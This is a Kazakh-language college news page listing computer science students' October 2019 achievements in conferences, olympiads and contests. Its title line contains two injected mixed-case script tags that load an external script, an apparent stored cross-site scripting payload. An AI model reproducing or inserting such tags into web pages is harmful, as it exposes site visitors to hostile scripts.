Информатика бөлімі студенттерінің қазан айындағы жетістіктері<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

29.10.2019

    Ы.Алтынсарин  атындағы ұлттық білім академиясының ұйымдастыруымен  «Білім берудегі инновациялар: ізденіс және шешімдер» атты VI Халықаралық ғылыми-практикалық конференцияға сырттай қатысқандығын және материалдар жинағында информатика бөлімінің 3 курс студенті Зейнелғабиден Саида және 2 курс студенті Құрман Әділхан «Робототехника – болашақтың бағдары» мақаласын жарияланғандығы үшін сертификатпен марапатталды. Жетекшісі - Р.Здуалиев. Оқушылар мен студенттерге арналған «Корифей» білім беру орталығының ұйымдастыруымен өткен І Республикалық пәндік олимпиадаға информатика бөлімінің 2 курс студенттері: Арғын Айбек, Даулет Елдос, Жақсылық Амантай, Есимов Диас, Ерболат Танжарык, Қабылқай Рахат, Камакаев Адильхан, Толейбай Ескендір, Хуантхан Женисбек, Хасымхан Ермахан қатысып І дәрежелі дипломдармен марапатталды. Жетекшісі: А. Қалменбай. Жалпы орта, техникалық және кәсіптік білім беру ұйымдарының білім алушылары арасында «Рухани жаңғыру» бағдарламасын іске асыру шеңберінде «Ата Заңым – Тұғырым!» республикалық интернет байқауына аса белсенділікпен қатысып И-11 тобының студенті Алькенов Данекер және И-21 тобының студенті Аманжолқызы Жанна жүлделі ІІ және ІІІ орынға ие болды. Жетекшілері: Д.Утебаева, А.Қамалиден.

 

Просмотров: 719


Пікір қосу



Деректерді қолтаңбаға қосу